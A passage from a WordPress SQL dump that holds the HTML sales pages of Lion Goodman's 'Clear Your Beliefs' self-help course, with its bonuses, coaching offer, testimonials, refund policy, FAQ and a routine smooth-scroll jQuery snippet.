anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1973, 2234, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, 